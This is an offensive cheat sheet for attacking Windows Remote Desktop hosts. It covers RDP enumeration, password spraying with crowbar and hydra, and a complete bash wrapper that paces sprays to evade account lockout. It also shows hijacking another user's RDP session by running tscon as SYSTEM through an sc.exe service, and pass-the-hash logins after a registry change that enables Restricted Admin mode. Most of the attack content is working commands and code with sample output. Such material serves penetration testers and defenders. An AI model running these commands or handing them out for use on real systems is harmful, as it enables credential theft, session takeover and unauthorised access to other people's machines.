RDP
Enumeration
nmap -Pn -p3389 192.168.2.143
Misconfiguration
We can brute-force credentials, but against RDP a much better approach is password spraying.
Spraying attempts a single password against many usernames before moving on to the next password, so each account only sees one failed logon per round. This helps avoid triggering the account lockout policy, provided the rounds are paced to the lockout threshold and observation window (check them with net accounts /domain once we have any foothold).
Crowbar Password Spraying
crowbar -b rdp -s IP/32 -U users.txt -c 'password123'
Hydra Password Spraying
hydra -L usernames.txt -p 'password123' IP rdp
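The pacing logic behind the two spray commands above, as an added bash wrapper around hydra (example code, not part of this cheat sheet). It assumes hydra is installed, that users.txt and passwords.txt hold one entry per line, and that the lockout threshold and observation window (in minutes) have been read from net accounts; a threshold of 0 means no lockout policy. Windows only resets the bad-password counter once a full observation window passes with no failed logon, so the wrapper sprays a batch of passwords back-to-back and then sleeps for the whole window before the next batch. hydra's -t and -W flags are real; SPRAY_CMD, spray_batch_size and the 5/30 policy values in the usage line are this example's own.

```bash
#!/usr/bin/env bash
# Lockout-aware RDP password spray wrapper around hydra (added example).
# Usage:   run_spray users.txt passwords.txt 192.168.2.143 5 30
#          (users, passwords, target, lockout threshold, observation window in minutes)
# Dry run: SPRAY_CMD=echo run_spray users.txt passwords.txt 192.168.2.143 5 30
set -u

SPRAY_CMD=${SPRAY_CMD:-hydra}   # set SPRAY_CMD=echo to print the commands instead
SPRAY_ROUNDS=0                  # rounds (passwords) actually sprayed, set by run_spray

# Passwords to try back-to-back before pausing for a full observation window.
# Attempts closer together than the window all count towards badPwdCount, so a
# batch must stay below the threshold. Two attempts are kept in reserve: one for
# the user's own typos and one for safety.
spray_batch_size() {
    local threshold=$1 n
    if [ "$threshold" -le 0 ]; then
        echo 0            # threshold 0 = accounts never lock out, no pause needed
        return
    fi
    n=$(( threshold - 2 ))
    [ "$n" -lt 1 ] && n=1
    echo "$n"
}

# Seconds to sleep between batches: the observation window plus one minute of margin,
# so the counter has definitely been reset before the next batch starts.
spray_pause_seconds() {
    local window_min=$1
    echo $(( window_min * 60 + 60 ))
}

# Kept separate so a dry run or test can replace it without sleeping for real.
pause_between_batches() { sleep "$1"; }

# One hydra run per password = exactly one attempt per user per round.
# -t 1 -W 1: RDP servers drop connections under parallel load, so go single-threaded
# and wait a second between connections.
run_spray() {
    local users=$1 passwords=$2 target=$3 threshold=$4 window_min=$5
    local batch pause total tried=0 pw
    batch=$(spray_batch_size "$threshold")
    pause=$(spray_pause_seconds "$window_min")
    total=$(grep -c . "$passwords" || true)   # non-empty lines = rounds to run
    SPRAY_ROUNDS=0
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -z "$pw" ] && continue
        # stdin redirected so the tool cannot eat the password list we are reading
        "$SPRAY_CMD" -L "$users" -p "$pw" -t 1 -W 1 "$target" rdp </dev/null \
            || echo "round for password '$pw' exited non-zero" >&2
        SPRAY_ROUNDS=$(( SPRAY_ROUNDS + 1 ))
        tried=$(( tried + 1 ))
        # Pause only when a batch is full and there are still passwords left.
        if [ "$batch" -gt 0 ] && [ "$tried" -ge "$batch" ] && [ "$SPRAY_ROUNDS" -lt "$total" ]; then
            echo "batch of $batch done, sleeping ${pause}s for the lockout window to reset" >&2
            pause_between_batches "$pause"
            tried=0
        fi
    done < "$passwords"
}
```

Source the file and call run_spray; with a threshold of 5 and a 30-minute window it sprays three passwords, sleeps 31 minutes, and continues. If the policy is unknown, treat it as the Windows default (threshold 0 locally, but many domains set 5 over 30 minutes) only after confirming it, since a single bad guess at the pacing locks out every account in the list.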
Logging In
Once we find valid credentials we can log in with rdesktop, xfreerdp or any other RDP client
rdesktop -u founduser -p pass IP
xfreerdp /v:IP /u:founduser /p:pass /cert:ignore +clipboard
RDP Session Hijacking
Once connected, we check whether our account has local administrator privileges. If it does, we can attempt to hijack another user's RDP session on the host.
We can list the logged-on users with Task Manager -> Users or from a PowerShell/cmd prompt
PowerShell
whoami
query user
...
Impersonate a User
To impersonate a user without their password we need SYSTEM privileges.
We can then use the tscon.exe binary to connect our session to the target's session
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
To obtain SYSTEM privileges we can use tools like Mimikatz or PsExec (psexec -s -i cmd.exe).
Alternatively, we can create a Windows service with the sc.exe binary: services run as Local System, so a service whose binary path is our tscon command executes it with SYSTEM privileges.
We first choose the service name (hijacksession) and the command we want it to execute. In the output below our own session is rdp-tcp#13 and the target session belonging to tommy has ID 2.
query user
 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>me                    rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
 tommy                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM
sc.exe create hijacksession binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
Lastly, we start the service
net start hijacksession
The Service Control Manager reports the service as failing to start (cmd.exe never answers it), which is expected; tscon has already run as SYSTEM and our RDP window is replaced by tommy's desktop without being asked for a password. The hijacked session keeps whatever the user had open, so check for unlocked tools and cached credentials before doing anything noisy. Newer Windows Server builds may refuse this reconnection, so verify it on the target version.
Pass The Hash
xfreerdp /v:IP /u:user /pth:hash
Pass-the-hash over RDP only works when Restricted Admin mode is enabled on the target; otherwise the logon fails with an "account restrictions" error. If we already have local administrator access on the host we can enable it ourselves by setting DisableRestrictedAdmin to 0 (note that this also allows anyone else with a hash to RDP in, and that a Restricted Admin session does not carry our credentials for further network authentication)
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f